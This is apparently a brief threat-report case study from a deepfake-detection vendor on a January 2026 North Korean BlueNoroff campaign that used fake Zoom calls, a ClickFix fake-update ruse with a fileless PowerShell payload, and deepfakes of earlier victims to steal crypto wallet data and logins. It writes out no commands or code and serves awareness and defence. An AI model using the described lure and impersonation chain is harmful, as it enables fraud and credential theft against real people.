Detect Deepfakesby Resemble AI
Deepfake case study · Video

How AI Is Being Used to Drain Crypto Wallets (Deepfakes, Fake Calls and Recovery Scams)

North Korean hackers used AI deepfakes and fake Zoom calls to compromise over 100 Web3 executives in a sophisticated credential theft operation

Incident date
Jan 2026
Target
Web3 executives
Updated Jul 4, 2026 · 1 min read

On January 23, 2026, North Korean threat group BlueNoroff successfully breached a North American Web3 company using a sophisticated campaign involving fake Zoom calls and AI-generated deepfakes. The attackers maintained quiet access to the target's systems for 66 days, part of a wider operation that compromised more than 100 executives across 20 countries.

What happened

The attack began with a deceptive Calendly invitation sent by an actor posing as a fintech lawyer. The invite included a typo-squatted Zoom link designed to mimic a legitimate meeting platform. Once the target joined the call, they were prompted to perform a fake Zoom SDK update via a "ClickFix" ruse. By copying and pasting the provided commands, the victim unknowingly executed a fileless PowerShell payload that granted the attackers immediate access to browser logins, crypto wallet data, and active Telegram sessions.

To maintain credibility during these interactions, the hackers utilized a library of deepfake content. This included stolen webcam footage, AI-generated headshots, and composite video of prior victims. Investigators identified that these synthetic assets were generated using OpenAI's GPT-4o model. The campaign functioned as a self-reinforcing cycle: by compromising one victim, the attackers gained access to their contacts and identity, which they then used to impersonate trusted individuals to lure the next wave of targets. Approximately 80% of those targeted held roles in crypto or blockchain finance, with founders and chief executives representing nearly half of the victims. The operation was traced back to the BlueNoroff group, a financially motivated arm of the Lazarus Group, after researchers discovered metadata linked to a macOS username "king" within the deepfake files.

Sources